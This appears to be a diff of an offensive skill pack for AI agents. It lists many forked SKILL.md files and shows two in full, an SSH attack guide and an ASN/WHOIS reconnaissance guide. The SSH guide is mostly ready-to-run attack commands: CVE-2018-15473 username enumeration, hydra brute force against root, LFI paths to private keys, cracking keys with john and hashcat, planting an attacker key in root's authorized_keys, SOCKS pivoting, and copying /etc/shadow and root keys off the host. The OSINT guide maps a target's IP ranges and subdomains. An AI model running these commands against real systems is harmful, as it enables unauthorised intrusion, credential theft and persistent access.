- package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md +266 -0
- package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md +226 -0
- package/skills/offensive/airecon-fork/technologies-firebase-firestore/SKILL.md +213 -0
- package/skills/offensive/airecon-fork/technologies-frida-hooking/SKILL.md +387 -0
- package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md +259 -0
- package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md +256 -0
- package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md +281 -0
- package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md +230 -0
- package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md +257 -0
- package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md +280 -0
- package/skills/offensive/airecon-fork/technologies-observability-stack-attacks/SKILL.md +501 -0
- package/skills/offensive/airecon-fork/technologies-redis/SKILL.md +236 -0
- package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md +232 -0
- package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md +351 -0
- package/skills/offensive/airecon-fork/tools-browser-automation/SKILL.md +300 -0
- package/skills/offensive/airecon-fork/tools-caido/SKILL.md +776 -0
- package/skills/offensive/airecon-fork/tools-code-review/SKILL.md +71 -0
- package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md +189 -0
- package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md +258 -0
- package/skills/offensive/airecon-fork/tools-impacket/SKILL.md +227 -0
- package/skills/offensive/airecon-fork/tools-install/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/tools-nmap/SKILL.md +211 -0
- package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md +175 -0
- package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
- package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
- package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
- package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
- package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
- package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
- package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
- package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
- package/skills/offensive/matty-fork/cicd-redteam/SKILL.md +531 -0
- package/skills/offensive/matty-fork/cloud-security/SKILL.md +106 -0
- package/skills/offensive/matty-fork/container-escape/SKILL.md +174 -0
- package/skills/offensive/matty-fork/mobile-pentester/SKILL.md +357 -0
- package/skills/offensive/matty-fork/subdomain-takeover/SKILL.md +154 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/README.md +92 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/SKILL.md +4177 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/README.md +66 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/SKILL.md +1695 -0
|
@@ -0,0 +1,287 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: ssh
|
|
5
|
+
description: SSH security testing covering user enumeration, brute force, key analysis, tunneling for pivoting, known CVEs, and SSH-specific misconfiguration testing
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# SSH Security Testing
|
|
9
|
+
|
|
10
|
+
SSH (Secure Shell) is on nearly every server. Attack surface: username enumeration, credential brute force, weak/reused SSH keys, authorized_keys misconfiguration, SSH tunneling for pivoting, and known CVEs including timing-based user enumeration.
|
|
11
|
+
|
|
12
|
+
---
|
|
13
|
+
|
|
14
|
+
## Reconnaissance
|
|
15
|
+
|
|
16
|
+
### Discovery
|
|
17
|
+
|
|
18
|
+
# Port scanning
|
|
19
|
+
nmap -p 22,2222,22222 <target> -sV --open
|
|
20
|
+
|
|
21
|
+
# Common SSH ports:
|
|
22
|
+
# 22 — standard
|
|
23
|
+
# 2222 — common alternative
|
|
24
|
+
# 22222 — less common alternative
|
|
25
|
+
|
|
26
|
+
# SSH banner grab (version + OS info):
|
|
27
|
+
nc <target> 22
|
|
28
|
+
# SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4
|
|
29
|
+
# Reveals: OpenSSH version, OS distribution
|
|
30
|
+
|
|
31
|
+
nmap -p 22 --script ssh-hostkey,ssh2-enum-algos <target>
|
|
32
|
+
|
|
33
|
+
---
|
|
34
|
+
|
|
35
|
+
## Username Enumeration
|
|
36
|
+
|
|
37
|
+
### CVE-2018-15473 — OpenSSH Username Enumeration
|
|
38
|
+
|
|
39
|
+
Affects OpenSSH < 7.7 — timing difference reveals valid usernames:
|
|
40
|
+
|
|
41
|
+
# Tool: https://github.com/Sait-Nuri/CVE-2018-15473
|
|
42
|
+
python3 CVE-2018-15473.py --target <target> --username admin
|
|
43
|
+
# "admin" is a valid user / "admin" is an invalid user
|
|
44
|
+
|
|
45
|
+
# Automated with wordlist:
|
|
46
|
+
python3 CVE-2018-15473.py --target <target> --userList /usr/share/seclists/Usernames/top-usernames-shortlist.txt
|
|
47
|
+
|
|
48
|
+
# Metasploit:
|
|
49
|
+
use auxiliary/scanner/ssh/ssh_enumusers
|
|
50
|
+
set RHOSTS <target>
|
|
51
|
+
set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt
|
|
52
|
+
run
|
|
53
|
+
|
|
54
|
+
# Common SSH usernames to test:
|
|
55
|
+
root, admin, ubuntu, ec2-user, centos, debian, pi, vagrant, git, deploy,
|
|
56
|
+
www-data, postgres, mysql, oracle, hadoop, ansible, jenkins
|
|
57
|
+
|
|
58
|
+
---
|
|
59
|
+
|
|
60
|
+
## Brute Force
|
|
61
|
+
|
|
62
|
+
# Hydra (most common):
|
|
63
|
+
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<target>
|
|
64
|
+
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
|
|
65
|
+
-P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
|
|
66
|
+
ssh://<target> -t 4
|
|
67
|
+
|
|
68
|
+
# Medusa:
|
|
69
|
+
medusa -h <target> -u root -P /usr/share/wordlists/rockyou.txt -M ssh
|
|
70
|
+
|
|
71
|
+
# nmap brute (slower):
|
|
72
|
+
nmap --script ssh-brute -p 22 <target>
|
|
73
|
+
|
|
74
|
+
# Patator (parallel, smarter throttling):
|
|
75
|
+
patator ssh_login host=<target> user=FILE0 password=FILE1 \
|
|
76
|
+
0=/usr/share/seclists/Usernames/common-usernames.txt \
|
|
77
|
+
1=/usr/share/wordlists/rockyou.txt \
|
|
78
|
+
-x ignore:mesg='Authentication failed'
|
|
79
|
+
|
|
80
|
+
# Rate: limit to 4 threads to avoid lockout
|
|
81
|
+
# Target MaxAuthTries usually 6 — stop after 5 attempts per user
|
|
82
|
+
|
|
83
|
+
---
|
|
84
|
+
|
|
85
|
+
## SSH Key Attacks
|
|
86
|
+
|
|
87
|
+
### Weak Key Generation
|
|
88
|
+
|
|
89
|
+
# Debian/Ubuntu 2008 OpenSSL RNG bug (CVE-2008-0166):
|
|
90
|
+
# Keys generated with broken entropy — only 32,768 possible key pairs
|
|
91
|
+
# Download pre-computed keysets:
|
|
92
|
+
# https://github.com/g0tmi1k/debian-ssh
|
|
93
|
+
|
|
94
|
+
# Test if server uses a Debian weak key:
|
|
95
|
+
python3 -c "
|
|
96
|
+
# Download blacklist and check against server's host key
|
|
97
|
+
# curl https://raw.githubusercontent.com/g0tmi1k/debian-ssh/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2
|
|
98
|
+
"
|
|
99
|
+
|
|
100
|
+
### Finding SSH Private Keys
|
|
101
|
+
|
|
102
|
+
# Scan target for exposed private keys (via LFI, file read, misconfigured web):
|
|
103
|
+
GET /.ssh/id_rsa
|
|
104
|
+
GET /.ssh/id_dsa
|
|
105
|
+
GET /.ssh/id_ecdsa
|
|
106
|
+
GET /.ssh/id_ed25519
|
|
107
|
+
GET /home/<user>/.ssh/id_rsa
|
|
108
|
+
GET /root/.ssh/id_rsa
|
|
109
|
+
GET /backup/id_rsa
|
|
110
|
+
GET /id_rsa
|
|
111
|
+
GET /key.pem
|
|
112
|
+
GET /server.key
|
|
113
|
+
|
|
114
|
+
# In git repositories:
|
|
115
|
+
git log --all -p | grep -E "BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY"
|
|
116
|
+
trufflehog git . --json | grep ssh
|
|
117
|
+
|
|
118
|
+
# Check authorized_keys (via LFI):
|
|
119
|
+
GET /root/.ssh/authorized_keys
|
|
120
|
+
GET /home/<user>/.ssh/authorized_keys
|
|
121
|
+
|
|
122
|
+
### Cracking Encrypted SSH Keys
|
|
123
|
+
|
|
124
|
+
# If private key is passphrase-protected:
|
|
125
|
+
ssh2john id_rsa > id_rsa.hash
|
|
126
|
+
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
|
|
127
|
+
|
|
128
|
+
# hashcat:
|
|
129
|
+
python3 ssh2john.py id_rsa | tee id_rsa.hash
|
|
130
|
+
hashcat -m 22921 id_rsa.hash /usr/share/wordlists/rockyou.txt # RSA
|
|
131
|
+
|
|
132
|
+
### Injecting SSH Keys
|
|
133
|
+
|
|
134
|
+
# If write access exists (via RCE, Redis, file upload):
|
|
135
|
+
# 1. Generate key pair:
|
|
136
|
+
ssh-keygen -t rsa -b 4096 -f /tmp/attack_key -N ""
|
|
137
|
+
|
|
138
|
+
# 2. Append public key to authorized_keys:
|
|
139
|
+
echo "$(cat /tmp/attack_key.pub)" >> /root/.ssh/authorized_keys
|
|
140
|
+
# Or overwrite entirely if file doesn't exist
|
|
141
|
+
|
|
142
|
+
# 3. Connect:
|
|
143
|
+
ssh -i /tmp/attack_key root@<target>
|
|
144
|
+
|
|
145
|
+
---
|
|
146
|
+
|
|
147
|
+
## SSH Tunneling (Pivoting)
|
|
148
|
+
|
|
149
|
+
### Local Port Forwarding
|
|
150
|
+
|
|
151
|
+
Forward a remote service to your local machine:
|
|
152
|
+
|
|
153
|
+
# Access remote service (e.g., internal web app on port 8080):
|
|
154
|
+
ssh -L 8080:localhost:8080 user@<target>
|
|
155
|
+
# Now browse http://localhost:8080 = remote's localhost:8080
|
|
156
|
+
|
|
157
|
+
# Access internal network host:
|
|
158
|
+
ssh -L 5432:internal-db:5432 user@<target>
|
|
159
|
+
# psql -h localhost -p 5432 = connects to internal-db:5432
|
|
160
|
+
|
|
161
|
+
### Remote Port Forwarding
|
|
162
|
+
|
|
163
|
+
Expose attacker service through the target:
|
|
164
|
+
|
|
165
|
+
# Allow target to connect back to attacker service:
|
|
166
|
+
ssh -R 4444:localhost:4444 user@<target>
|
|
167
|
+
# On target: nc localhost 4444 = connects to attacker's 4444
|
|
168
|
+
|
|
169
|
+
### Dynamic Port Forwarding (SOCKS Proxy)
|
|
170
|
+
|
|
171
|
+
Route all traffic through target as SOCKS proxy:
|
|
172
|
+
|
|
173
|
+
# Create SOCKS5 proxy on local port 1080:
|
|
174
|
+
ssh -D 1080 user@<target>
|
|
175
|
+
|
|
176
|
+
# Use with proxychains:
|
|
177
|
+
# Edit /etc/proxychains.conf: socks5 127.0.0.1 1080
|
|
178
|
+
proxychains nmap -sT -p 80,443,8080 <internal_network>/24
|
|
179
|
+
proxychains curl http://internal-app/
|
|
180
|
+
proxychains hydra -l admin -P rockyou.txt http-get://internal-server/
|
|
181
|
+
|
|
182
|
+
### Jump Host / ProxyJump
|
|
183
|
+
|
|
184
|
+
Pivot through intermediary hosts:
|
|
185
|
+
|
|
186
|
+
# Jump through bastion to internal server:
|
|
187
|
+
ssh -J user@bastion user@internal-server
|
|
188
|
+
|
|
189
|
+
# Multi-hop:
|
|
190
|
+
ssh -J user@hop1,user@hop2 user@final-target
|
|
191
|
+
|
|
192
|
+
# SSH config for persistent pivoting:
|
|
193
|
+
Host internal
|
|
194
|
+
HostName 10.0.0.100
|
|
195
|
+
User admin
|
|
196
|
+
ProxyJump user@bastion.target.com
|
|
197
|
+
IdentityFile ~/.ssh/attack_key
|
|
198
|
+
|
|
199
|
+
---
|
|
200
|
+
|
|
201
|
+
## SSH Configuration Misconfigurations
|
|
202
|
+
|
|
203
|
+
# Check sshd_config for dangerous settings:
|
|
204
|
+
cat /etc/ssh/sshd_config
|
|
205
|
+
|
|
206
|
+
# Dangerous settings:
|
|
207
|
+
PermitRootLogin yes # Root login enabled
|
|
208
|
+
PasswordAuthentication yes # Password auth (brute-forceable)
|
|
209
|
+
PermitEmptyPasswords yes # Empty password = instant login
|
|
210
|
+
AllowAgentForwarding yes # Agent forwarding = key theft possible
|
|
211
|
+
X11Forwarding yes # X11 = display capture / GUI access
|
|
212
|
+
UseDNS no # Fine (performance)
|
|
213
|
+
MaxAuthTries 6 # Default — reduce for brute-force protection
|
|
214
|
+
AuthorizedKeysFile .ssh/authorized_keys %h/.ssh/authorized_keys2 # Both files
|
|
215
|
+
|
|
216
|
+
# Check if SSH agent forwarding is enabled and abusable:
|
|
217
|
+
# If PermitAgentForwarding yes + attacker has root on jump host:
|
|
218
|
+
# Read /tmp/ssh-XXXXXXXX/agent.XXXX socket = steal forwarded SSH agent
|
|
219
|
+
|
|
220
|
+
---
|
|
221
|
+
|
|
222
|
+
## CVE Exploitation
|
|
223
|
+
|
|
224
|
+
| CVE | Component | Impact |
|
|
225
|
+
|-----|-----------|--------|
|
|
226
|
+
| CVE-2023-38408 | OpenSSH | Remote code execution via ssh-agent |
|
|
227
|
+
| CVE-2023-48795 | OpenSSH | Terrapin: MITM protocol downgrade |
|
|
228
|
+
| CVE-2018-15473 | OpenSSH < 7.7 | Username enumeration |
|
|
229
|
+
| CVE-2016-0777 | OpenSSH | Roaming info leak (private key) |
|
|
230
|
+
| CVE-2008-0166 | Debian OpenSSL | Predictable private keys |
|
|
231
|
+
|
|
232
|
+
# CVE-2023-48795 (Terrapin) — SSH protocol downgrade:
|
|
233
|
+
# Weakens connection security via MITM prefix truncation
|
|
234
|
+
# Check: ssh-audit <target>
|
|
235
|
+
pip install ssh-audit
|
|
236
|
+
ssh-audit <target>
|
|
237
|
+
# Look for: "KEX strict mode" not supported = potentially vulnerable
|
|
238
|
+
|
|
239
|
+
# CVE-2023-38408 — OpenSSH ssh-agent RCE:
|
|
240
|
+
# Affects OpenSSH < 9.3p2 with agent forwarding and PKCS#11
|
|
241
|
+
# Requires agent forwarding to a malicious server
|
|
242
|
+
|
|
243
|
+
---
|
|
244
|
+
|
|
245
|
+
## SSH Key and Algorithm Audit
|
|
246
|
+
|
|
247
|
+
# Check supported algorithms (weak algorithms = downgrade attack):
|
|
248
|
+
ssh-audit <target> # Full SSH security audit
|
|
249
|
+
nmap --script ssh2-enum-algos <target>
|
|
250
|
+
|
|
251
|
+
# Weak algorithms to look for:
|
|
252
|
+
# KEX: diffie-hellman-group1-sha1, diffie-hellman-group14-sha1
|
|
253
|
+
# Encryption: arcfour, blowfish-cbc, 3des-cbc
|
|
254
|
+
# MAC: hmac-md5, hmac-sha1-96
|
|
255
|
+
|
|
256
|
+
# Test connection with weak cipher (if supported):
|
|
257
|
+
ssh -c 3des-cbc user@<target> # Very old cipher
|
|
258
|
+
|
|
259
|
+
---
|
|
260
|
+
|
|
261
|
+
## Sensitive File Extraction via SSH/SCP
|
|
262
|
+
|
|
263
|
+
# If credentials obtained:
|
|
264
|
+
scp user@<target>:/etc/shadow ./shadow # Password hashes
|
|
265
|
+
scp user@<target>:/root/.ssh/id_rsa ./root_key # Root SSH key
|
|
266
|
+
scp user@<target>:/var/www/html/config.php ./config.php # Web app config
|
|
267
|
+
scp -r user@<target>:/home/ ./home_dirs/ # All home dirs
|
|
268
|
+
|
|
269
|
+
# Find secrets on the filesystem:
|
|
270
|
+
ssh user@<target> "find / -name '*.env' -o -name 'id_rsa' -o -name 'credentials*' 2>/dev/null | head -50"
|
|
271
|
+
ssh user@<target> "grep -r 'password' /etc/ --include='*.conf' 2>/dev/null"
|
|
272
|
+
|
|
273
|
+
---
|
|
274
|
+
|
|
275
|
+
## Pro Tips
|
|
276
|
+
|
|
277
|
+
1. CVE-2018-15473 username enumeration works on OpenSSH < 7.7 — still extremely common
|
|
278
|
+
2. Weak SSH keys from Debian 2008 bug are still active on some old systems — check host keys
|
|
279
|
+
3. SSH agent forwarding abuse requires root on jump host but yields all forwarded keys
|
|
280
|
+
4. Dynamic SOCKS proxy (`-D 1080`) + proxychains enables full network pivot in one command
|
|
281
|
+
5. Always check `/root/.ssh/authorized_keys` for existing keys revealing other compromised systems
|
|
282
|
+
6. PermitEmptyPasswords = instant root login with empty password — test with `ssh root@target` (press Enter)
|
|
283
|
+
7. `ssh-audit` reveals weak algorithms and known CVEs in one scan
|
|
284
|
+
|
|
285
|
+
## Summary
|
|
286
|
+
|
|
287
|
+
SSH testing = CVE-2018-15473 username enumeration + brute force (hydra) + private key search (LFI/git history) + key injection via other RCE. SSH is rarely the entry point for external targets but is critical for lateral movement — set up SOCKS proxy (`-D 1080`) immediately after gaining any SSH access for full network pivot. Agent forwarding abuse on compromised jump hosts steals all users' SSH keys in transit.
|
|
@@ -0,0 +1,236 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: asn-whois-osint
|
|
5
|
+
description: ASN/CIDR discovery, WHOIS lookups, BGP enumeration, IP range mapping, and OSINT passive reconnaissance to map the full attack surface of an organization without active scanning
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# ASN / CIDR / WHOIS / OSINT Reconnaissance
|
|
9
|
+
|
|
10
|
+
Passive infrastructure mapping: find ALL IP ranges owned by a target using ASN lookups, WHOIS, BGP data, and OSINT — before any active scanning. Goal: build a complete picture of the organization's internet-facing assets.
|
|
11
|
+
|
|
12
|
+
---
|
|
13
|
+
|
|
14
|
+
## WHOIS
|
|
15
|
+
|
|
16
|
+
### Domain WHOIS
|
|
17
|
+
|
|
18
|
+
whois target.com
|
|
19
|
+
# Key fields to extract:
|
|
20
|
+
# Registrar, Registrant Org, Registrant Email, Name Servers, Admin Email
|
|
21
|
+
# Admin email → pivot to find other domains registered by same person/org
|
|
22
|
+
|
|
23
|
+
# Bulk domain WHOIS via web_search:
|
|
24
|
+
web_search("whois target.com")
|
|
25
|
+
web_search("site:whois.domaintools.com target.com")
|
|
26
|
+
|
|
27
|
+
### IP WHOIS (find IP owner and CIDR block)
|
|
28
|
+
|
|
29
|
+
whois 1.2.3.4
|
|
30
|
+
# Key fields: netname, org, CIDR, route, abuse email
|
|
31
|
+
# CIDR block revealed = scan entire range if in scope
|
|
32
|
+
|
|
33
|
+
# Example output:
|
|
34
|
+
# NetRange: 192.0.2.0 - 192.0.2.255
|
|
35
|
+
# CIDR: 192.0.2.0/24
|
|
36
|
+
# NetName: TARGET-CORP-NET
|
|
37
|
+
# Organization: Target Corp (TC-1234)
|
|
38
|
+
|
|
39
|
+
---
|
|
40
|
+
|
|
41
|
+
## ASN Lookup
|
|
42
|
+
|
|
43
|
+
ASN (Autonomous System Number) = organization's routing identity. One ASN = all their IP ranges.
|
|
44
|
+
|
|
45
|
+
# Find ASN by organization name:
|
|
46
|
+
whois -h whois.radb.net '!gAS<ASN>'
|
|
47
|
+
# Or use amass:
|
|
48
|
+
amass intel -org "Target Corp"
|
|
49
|
+
# Returns: ASN numbers associated with that org name
|
|
50
|
+
|
|
51
|
+
# Find ASN by IP:
|
|
52
|
+
whois -h whois.cymru.com " -v 1.2.3.4"
|
|
53
|
+
# Returns: ASN | IP | BGP Prefix | CC | Registry | Allocated | AS Name
|
|
54
|
+
|
|
55
|
+
# Bulk IPs:
|
|
56
|
+
whois -h whois.cymru.com " -v -f" << EOF
|
|
57
|
+
1.2.3.4
|
|
58
|
+
5.6.7.8
|
|
59
|
+
EOF
|
|
60
|
+
|
|
61
|
+
# Online alternatives (via web_search):
|
|
62
|
+
web_search("ASN lookup Target Corp site:bgp.he.net")
|
|
63
|
+
web_search("site:ipinfo.io \"Target Corp\" ASN")
|
|
64
|
+
|
|
65
|
+
---
|
|
66
|
+
|
|
67
|
+
## CIDR / IP Range Discovery
|
|
68
|
+
|
|
69
|
+
### From ASN → All IP ranges
|
|
70
|
+
|
|
71
|
+
# Once you have the ASN (e.g., AS12345):
|
|
72
|
+
whois -h whois.radb.net -- '-i origin AS12345' | grep -E "^route:"
|
|
73
|
+
# Lists all IP prefixes announced by that ASN
|
|
74
|
+
|
|
75
|
+
# Using amass:
|
|
76
|
+
amass intel -asn 12345
|
|
77
|
+
# Returns all CIDR blocks for that ASN
|
|
78
|
+
|
|
79
|
+
# asnmap (ProjectDiscovery — no API key needed):
|
|
80
|
+
asnmap -a AS12345 # CIDR blocks for ASN
|
|
81
|
+
asnmap -org "Target Corp" # Find ASN by org name + get CIDRs
|
|
82
|
+
asnmap -d target.com # ASN lookup via domain
|
|
83
|
+
asnmap -a AS12345 -json > output/asn_ranges.json
|
|
84
|
+
# Install: go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest
|
|
85
|
+
|
|
86
|
+
# Pipe to nrich for passive enrichment (no active scan):
|
|
87
|
+
asnmap -a AS12345 | mapcidr -silent | nrich -
|
|
88
|
+
# → gets all known open ports/CVEs for every IP in the ASN range from Shodan InternetDB
|
|
89
|
+
|
|
90
|
+
# mapcidr — expand CIDR to individual IPs:
|
|
91
|
+
echo "192.0.2.0/24" | mapcidr -silent
|
|
92
|
+
# Install: go install github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest
|
|
93
|
+
|
|
94
|
+
---
|
|
95
|
+
|
|
96
|
+
## BGP / Routing Intelligence
|
|
97
|
+
|
|
98
|
+
# Hurricane Electric BGP Toolkit (via web_search):
|
|
99
|
+
web_search("site:bgp.he.net \"Target Corp\"")
|
|
100
|
+
# Reveals: ASN, all prefixes, peer ASNs, routing table
|
|
101
|
+
|
|
102
|
+
# BGPView (via web_search):
|
|
103
|
+
web_search("site:bgpview.io \"Target Corp\"")
|
|
104
|
+
|
|
105
|
+
# RIPE NCC (for European orgs):
|
|
106
|
+
web_search("site:stat.ripe.net \"Target Corp\"")
|
|
107
|
+
|
|
108
|
+
# PeeringDB (find network presence):
|
|
109
|
+
web_search("site:peeringdb.com \"Target Corp\"")
|
|
110
|
+
|
|
111
|
+
---
|
|
112
|
+
|
|
113
|
+
## IP Enrichment with nrich (no API key)
|
|
114
|
+
|
|
115
|
+
nrich queries Shodan InternetDB — passive, no active scan:
|
|
116
|
+
|
|
117
|
+
# Single IP enrichment:
|
|
118
|
+
echo "1.2.3.4" | nrich -
|
|
119
|
+
|
|
120
|
+
# Bulk IPs from file:
|
|
121
|
+
cat output/live_ips.txt | nrich -
|
|
122
|
+
|
|
123
|
+
# JSON output:
|
|
124
|
+
cat output/live_ips.txt | nrich - -json > output/nrich_enriched.json
|
|
125
|
+
|
|
126
|
+
# nrich returns per IP (from Shodan InternetDB):
|
|
127
|
+
# - open_ports: [80, 443, 22, 3306]
|
|
128
|
+
# - cves: ["CVE-2021-44228", "CVE-2023-38408"]
|
|
129
|
+
# - cpes: ["cpe:/a:apache:http_server:2.4.49"]
|
|
130
|
+
# - tags: ["self-signed", "starttls"]
|
|
131
|
+
|
|
132
|
+
# Workflow: ASN → CIDR → IPs → nrich (passive pre-check) → nmap (targeted active scan)
|
|
133
|
+
asnmap -a AS12345 | mapcidr -silent | nrich - -json | tee output/nrich_results.json
|
|
134
|
+
|
|
135
|
+
---
|
|
136
|
+
|
|
137
|
+
## Subdomain / DNS OSINT
|
|
138
|
+
|
|
139
|
+
# Passive DNS — find all subdomains without active brute force:
|
|
140
|
+
|
|
141
|
+
# amass (comprehensive passive):
|
|
142
|
+
amass enum -passive -d target.com -o output/amass_passive.txt
|
|
143
|
+
|
|
144
|
+
# subfinder (ProjectDiscovery — multi-source passive):
|
|
145
|
+
subfinder -d target.com -o output/subfinder.txt
|
|
146
|
+
subfinder -d target.com -all -recursive -o output/subfinder_full.txt
|
|
147
|
+
|
|
148
|
+
# Certificate transparency (crt.sh):
|
|
149
|
+
curl -s "https://crt.sh/?q=%.target.com&output=json" | \
|
|
150
|
+
jq -r '.[].name_value' | sort -u > output/crtsh_subdomains.txt
|
|
151
|
+
|
|
152
|
+
# Or via web_search:
|
|
153
|
+
web_search("site:crt.sh %.target.com")
|
|
154
|
+
|
|
155
|
+
# dnsx — DNS resolution + validation:
|
|
156
|
+
cat output/subfinder.txt | dnsx -a -resp -o output/resolved.txt
|
|
157
|
+
|
|
158
|
+
---
|
|
159
|
+
|
|
160
|
+
## Reverse WHOIS / Email Pivot
|
|
161
|
+
|
|
162
|
+
Find all domains registered by the same organization:
|
|
163
|
+
|
|
164
|
+
# Via web_search:
|
|
165
|
+
web_search("reverse whois \"Target Corp\" site:viewdns.info")
|
|
166
|
+
web_search("reverse whois \"admin@target.com\" site:viewdns.info")
|
|
167
|
+
|
|
168
|
+
# DomainTools reverse WHOIS (via web_search):
|
|
169
|
+
web_search("site:domaintools.com \"Target Corp\" reverse whois")
|
|
170
|
+
|
|
171
|
+
